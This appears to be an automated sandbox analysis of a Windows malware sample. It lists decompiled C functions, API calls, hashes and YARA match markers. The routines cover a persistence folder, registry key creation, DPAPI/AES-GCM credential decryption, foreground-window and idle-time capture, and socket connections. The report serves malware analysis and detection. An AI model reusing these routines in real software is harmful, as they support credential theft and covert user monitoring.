                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction ID: bab513efa4ed7bf9b340fce4efe21c66aceecf9db260b5e240e0963f2cc01e74
                                  • Opcode Fuzzy Hash: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction Fuzzy Hash: 5F115EB1C40119AACB10EFA1DD49EEFBFB8EF19344F1041AAF505B2091DB38AB45CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004157A1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E004157A1(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t34;

				_t34 = __edx;
				_v8 = 0;
				E00401052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E0040357C( &_v8, _t34, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t34,  &_v8), 0, _a4);
				E00403777( &_v32);
				E00405FEB(_v8);
				return _a4;
			}








                                  0x004157a1
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction ID: 19a63838f8e1e6d763b3ca3dd868f266859aef75a557a0161fa2b0bf50ee1775
                                  • Opcode Fuzzy Hash: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction Fuzzy Hash: D70109B1C40119AACB10EBA1DD49EEFBBBCAF18344F10416AB505A2191EB78AB45CBD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412F0D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412F0D(void* __ecx) {
				char _v8;
				short* _t10;

				_t1 =  &_v8; // 0x41306c
				_t10 = L"SOFTWARE\\Microsoft\\Control Panel\\";
				if(RegOpenKeyExW(0x80000001, _t10, 0, 0xf003f, _t1) == 2) {
					_t2 =  &_v8; // 0x41306c
					RegCreateKeyExW(0x80000001, _t10, 0, 0, 0, 0xf003f, 0, _t2, 0);
				}
				_t3 =  &_v8; // 0x41306c
				return  *_t3;
			}





                                  0x00412f14
                                  0x00412f20
                                  0x00412f35
                                  0x00412f38
                                  0x00412f47
                                  0x00412f47
                                  0x00412f4d
                                  0x00412f54

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                  • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateOpen
                                  • String ID: SOFTWARE\Microsoft\Control Panel\$l0A
                                  • API String ID: 436179556-2156092134
                                  • Opcode ID: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                  • Instruction ID: 1f16a589a04c443d12bfafe5dd9e5f2cbd84612a4648573e2ca0ed0d46f4e2df
                                  • Opcode Fuzzy Hash: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                  • Instruction Fuzzy Hash: 71E0ED76505128FE972086969D88DEB7EBCDB8A7F4F204066FA09E2101D1619E40D5F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004133B6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004133B6(CHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				int _t4;
				void* _t13;
				void* _t16;

				_push(__ecx);
				_t13 = __edx;
				_v8 = 0;
				_t4 = CreateFileA(__ecx, 0x40000000, 0, 0, 2, 0, 0);
				_t16 = _t4;
				if(_t16 != 0xffffffff) {
					WriteFile(_t16, _t13, _a4,  &_v8, 0);
					_t4 = CloseHandle(_t16);
				}
				return _t4;
			}







                                  0x004133b9
                                  0x004133bf
                                  0x004133cd
                                  0x004133d0
                                  0x004133d6
                                  0x004133db
                                  0x004133e7
                                  0x004133ee
                                  0x004133ee
                                  0x004133f8

                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004133D0
                                  • WriteFile.KERNEL32(00000000,?,74A313FB,00000000,00000000), ref: 004133E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004133EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleWrite
                                  • String ID: :start
                                  • API String ID: 1065093856-1299720186
                                  • Opcode ID: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                  • Instruction ID: 7381dbcee1bd032b03ad7134698835e658c032dc0f213ba1ed2ce9562faf62e4
                                  • Opcode Fuzzy Hash: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                  • Instruction Fuzzy Hash: 01E092B2105218BFE3111B99AC89DEB7A7CDB893B9F108175FA25A2190D6304E0146B8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004109ED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E004109ED() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}








                                  0x004109fb
                                  0x00410a05
                                  0x00410a0d
                                  0x00410a28
                                  0x00410a28
                                  0x00410a2d
                                  0x00410a3b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00410a0f
                                  0x00410a15
                                  0x00410a1d
                                  0x00410a33
                                  0x00410a36
                                  0x00410a1f
                                  0x00410a26
                                  0x00000000
                                  0x00410a26
                                  0x00410a1d

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A05
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                  • Instruction ID: 1834724eec8d6658835532cdcab9f2cbecedca635d1db10f1c6d2903e3c751bb
                                  • Opcode Fuzzy Hash: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                  • Instruction Fuzzy Hash: 5AE0923178034856CB385B745D1BBDB7BE85F12745F4444A5E182E1280EAB8C9C2CA98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A3C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00410A3C() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}








                                  0x00410a4a
                                  0x00410a54
                                  0x00410a5c
                                  0x00410a77
                                  0x00410a7e
                                  0x00000000
                                  0x00410a80
                                  0x00410a87
                                  0x00410a87
                                  0x00410a5e
                                  0x00410a64
                                  0x00410a6c
                                  0x00410a88
                                  0x00410a8b
                                  0x00410a6e
                                  0x00410a75
                                  0x00000000
                                  0x00410a75
                                  0x00410a6c

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A54
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                  • Instruction ID: 148d00e3e7ffb053b7c10c9a99ab11a5aecab5e32aa73cb5a336ee4092301f00
                                  • Opcode Fuzzy Hash: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                  • Instruction Fuzzy Hash: 43E0123068031C56CB349B71AC0AADB77B45B12745F4085E5E245E2180EAB8CDC68FD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004121DC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E004121DC(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8);
				}
				return _v8;
			}






                                  0x004121df
                                  0x004121e0
                                  0x004121ef
                                  0x004121f8
                                  0x00412200
                                  0x00412208
                                  0x00412208
                                  0x0041220f

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                  • GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: IsWow64Process$kernel32
                                  • API String ID: 1646373207-3789238822
                                  • Opcode ID: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                  • Instruction ID: 98e0a5f9caf74d9bea286be05565737d668b157ad2b0005c06096195e846ebc9
                                  • Opcode Fuzzy Hash: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                  • Instruction Fuzzy Hash: 86E08C32600204FBDB14DBA0EC0AFDE7BB8EB08350B2005A9B501E2050DBB9EE00D698
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D01D, Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0040D01D(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E004021ED( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E00401F98(_t63);
						}
						_t23 = E004021ED( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E00401F98( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E00401F6D(_t63, E0040CF43,  &_v12);
						E00401F6D( &(_t59[0xf3]), E0040CFB0,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E004021ED( &(_t59[0xf1]), 0xffffffff);
						E004021ED( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E0040D1C8(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E00403507(_t66, _t62);
						if(E0040594B( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E00403507(_t66, _t62 + 8);
					if(E0040594B( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}












                                  0x0040d01d
                                  0x0040d020
                                  0x0040d021
                                  0x0040d025
                                  0x0040d027
                                  0x0040d02e
                                  0x0040d034
                                  0x0040d03b
                                  0x0040d03e
                                  0x0040d05e
                                  0x0040d05e
                                  0x0040d062
                                  0x0040d08b
                                  0x0040d08b
                                  0x0040d095
                                  0x0040d09a
                                  0x0040d09c
                                  0x0040d0a0
                                  0x0040d0a0
                                  0x0040d0ad
                                  0x0040d0b2
                                  0x0040d0b4
                                  0x0040d0bc
                                  0x0040d0bc
                                  0x0040d0c6
                                  0x0040d0cf
                                  0x0040d0db
                                  0x0040d0ef
                                  0x0040d0fb
                                  0x0040d101
                                  0x0040d10b
                                  0x0040d118
                                  0x0040d11e
                                  0x0040d124
                                  0x0040d128
                                  0x0040d12c
                                  0x0040d131
                                  0x0040d131
                                  0x0040d064
                                  0x0040d06b
                                  0x0040d07a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d07a
                                  0x0040d040
                                  0x0040d04a
                                  0x0040d05c
                                  0x0040d07c
                                  0x0040d07d
                                  0x0040d085
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d05c
                                  0x0040d137

                                  APIs
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D02E
                                  • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D07D
                                    • Part of subcall function 00403507: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402BD2,?,?,00000000,exit,00000000,start), ref: 0040352C
                                    • Part of subcall function 0040594B: getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                    • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                    • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                    • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                    • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D101
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D11E
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D128
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                  • String ID:
                                  • API String ID: 4195813003-0
                                  • Opcode ID: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
                                  • Instruction ID: ffd892ab46af73f70c32251edc3eb7415e86c97fd1647a449630ba4d99c917e8
                                  • Opcode Fuzzy Hash: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
                                  • Instruction Fuzzy Hash: F9319771600506BBD704EBB1CC55FAEB7ACAF04358F00423AF51AB21D1DB78AA15CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410BBE, Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410BBE(WCHAR** __ecx, intOrPtr* __edx) {
				struct HRSRC__* _t13;
				void* _t14;
				unsigned int _t32;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;

				_t35 = __edx;
				_t36 = LoadLibraryExW( *__ecx, 0, 2);
				if(_t36 == 0xffffffff) {
					L4:
					return 0;
				}
				_t13 = FindResourceW(_t36, 1, 0x10);
				if(_t13 == 0) {
					goto L4;
				}
				_t14 = LoadResource(_t36, _t13);
				if(_t14 == 0) {
					goto L4;
				}
				_t32 =  *(_t14 + 0x28);
				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
				 *(_t35 + 8) = _t32 & 1;
				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
				FreeLibrary(_t36);
				return 1;
			}








                                  0x00410bc7
                                  0x00410bcf
                                  0x00410bd4
                                  0x00410c38
                                  0x00000000
                                  0x00410c38
                                  0x00410bdd
                                  0x00410be5
                                  0x00000000
                                  0x00000000
                                  0x00410be9
                                  0x00410bf1
                                  0x00000000
                                  0x00000000
                                  0x00410bf6
                                  0x00410bf9
                                  0x00410bff
                                  0x00410c0b
                                  0x00410c0f
                                  0x00410c24
                                  0x00410c28
                                  0x00410c2b
                                  0x00410c2e
                                  0x00000000

                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BC9
                                  • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BDD
                                  • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BE9
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410C2E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadResource$FindFree
                                  • String ID:
                                  • API String ID: 3272429154-0
                                  • Opcode ID: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                  • Instruction ID: f4e202401f230fa34ee939e17adc442f0fb496cb623fe9efe51c7003b0681515
                                  • Opcode Fuzzy Hash: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                  • Instruction Fuzzy Hash: A601C0B5315A05AFD3184F299C84AA6B6A4FF49310704C239E825C73A0D7B8D891CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C157, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0040C157(void* __ecx, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t16;
				void* _t19;
				void* _t34;
				void* _t35;

				_t35 = 0;
				_t16 = E0040C3B9(__ecx,  &_v12,  &_v8);
				_pop(_t26);
				if(_t16 == 0) {
					L8:
					return _t35;
				}
				_t34 = _v12;
				if(_v8 >= 5) {
					_t19 = E00401000(_t34, "DPAPI", 5);
					_t42 = _t19;
					if(_t19 == 0) {
						_push( &_v16);
						_push( &_v12);
						if(E0040C1DD(_t34 + 5, _v8 - 5, _t42) != 0) {
							if(_v16 == 0x20) {
								_t35 = E0040C419(_t22, _v12, _a8, _a12);
							}
							LocalFree(_v12);
						}
					}
				}
				LocalFree(_t34);
				goto L8;
			}










                                  0x0040c166
                                  0x0040c168
                                  0x0040c16d
                                  0x0040c170
                                  0x0040c1d8
                                  0x0040c1dc
                                  0x0040c1dc
                                  0x0040c176
                                  0x0040c179
                                  0x0040c183
                                  0x0040c18b
                                  0x0040c18d
                                  0x0040c196
                                  0x0040c19a
                                  0x0040c1ae
                                  0x0040c1b4
                                  0x0040c1c5
                                  0x0040c1c5
                                  0x0040c1ca
                                  0x0040c1ca
                                  0x0040c1ae
                                  0x0040c18d
                                  0x0040c1d1
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040C1D1
                                    • Part of subcall function 0040C1DD: GetLastError.KERNEL32 ref: 0040C243
                                  • LocalFree.KERNEL32(?), ref: 0040C1CA
                                    • Part of subcall function 0040C419: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                    • Part of subcall function 0040C419: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                    • Part of subcall function 0040C419: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                  • String ID: $DPAPI
                                  • API String ID: 379455710-1819349886
                                  • Opcode ID: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction ID: a3944bf262eb46a5dfa84945d41dbb41adefefd1d9f51366da1d16fc86cbb9f5
                                  • Opcode Fuzzy Hash: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction Fuzzy Hash: ED016176900109EBCF10EBA1DC859EEB779AB44358F018276FD00B61C5E774AA45CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004048B7, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E004048B7(intOrPtr _a4) {
				char _v8;
				struct tagLASTINPUTINFO _v16;
				signed int _v36;
				char _v40;
				short _v552;

				_v16.cbSize = 8;
				GetLastInputInfo( &_v16);
				_t23 = GetTickCount() - _v16.dwTime;
				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
				E004036F7( &_v8,  &_v552);
				_t12 =  &_v36;
				_v36 = _v36 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v40 = 0x15;
				asm("movups [ebp-0x1c], xmm0");
				E0040378B(E00403873(E00403852( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
				E00403777( &_v40);
				E00405FEB(_v8);
				return _a4;
			}








                                  0x004048c4
                                  0x004048cc
                                  0x004048d8
                                  0x004048f9
                                  0x00404909
                                  0x00404911
                                  0x00404911
                                  0x00404919
                                  0x0040491c
                                  0x00404927
                                  0x00404939
                                  0x00404941
                                  0x00404949
                                  0x00404953

                                  APIs
                                  • GetLastInputInfo.USER32 ref: 004048CC
                                  • GetTickCount.KERNEL32 ref: 004048D2
                                  • GetForegroundWindow.USER32 ref: 004048E6
                                  • GetWindowTextW.USER32 ref: 004048F9
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                  • String ID:
                                  • API String ID: 2567647128-0
                                  • Opcode ID: 46720f723d15755cbf12386a5d990a83d361cd051bbd11b0eb8a51d3c765656a
                                  • Instruction ID: 7d24786f3acb5e761febb0f7532cdf611125a99f062c3633d978c4158144353a
                                  • Opcode Fuzzy Hash: 46720f723d15755cbf12386a5d990a83d361cd051bbd11b0eb8a51d3c765656a
                                  • Instruction Fuzzy Hash: D2110C72D00109ABCB04EFA1DD59ADDBBBDEF58305F0081A9B406B7191EF78AB44CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FFA8, Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040FFA8(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t1 = _t27 + 0x14; // 0x42661c
				_t26 = _t1;
				if( *_t26 == 0) {
					L6:
					_t5 = _t27 + 0x10; // 0x426618
					E004101AB(_t5);
					_t6 = _t27 + 4; // 0x42660c
					E004101AB(_t6);
					_t7 = _t27 + 0xc; // 0x426614
					E004101AB(_t7);
					_t8 = _t27 + 8; // 0x426610
					_t14 = E004101AB(_t8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				_t2 = _t27 + 0x18; // 0x0
				if(_t15 ==  *_t2) {
					L5:
					E004101AB(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				_t4 = _t27 + 0x10; // 0x0
				SetEvent( *_t4);
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}







                                  0x0040ffa9
                                  0x0040ffac
                                  0x0040ffac
                                  0x0040ffb2
                                  0x0040fff3
                                  0x0040fff3
                                  0x0040fff6
                                  0x0040fffb
                                  0x0040fffe
                                  0x00410003
                                  0x00410006
                                  0x0041000b
                                  0x0041000e
                                  0x00410013
                                  0x00000000
                                  0x00410013
                                  0x0040ffb4
                                  0x0040ffba
                                  0x0040ffbd
                                  0x0040ffec
                                  0x0040ffee
                                  0x00000000
                                  0x0040ffee
                                  0x0040ffc3
                                  0x00410019
                                  0x00410019
                                  0x0040ffc5
                                  0x0040ffc8
                                  0x0040ffe0
                                  0x0040ffe6
                                  0x0040ffe6
                                  0x00000000

                                  APIs
                                  • GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                  • SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                  • WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                  • TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                  • String ID:
                                  • API String ID: 2174867186-0
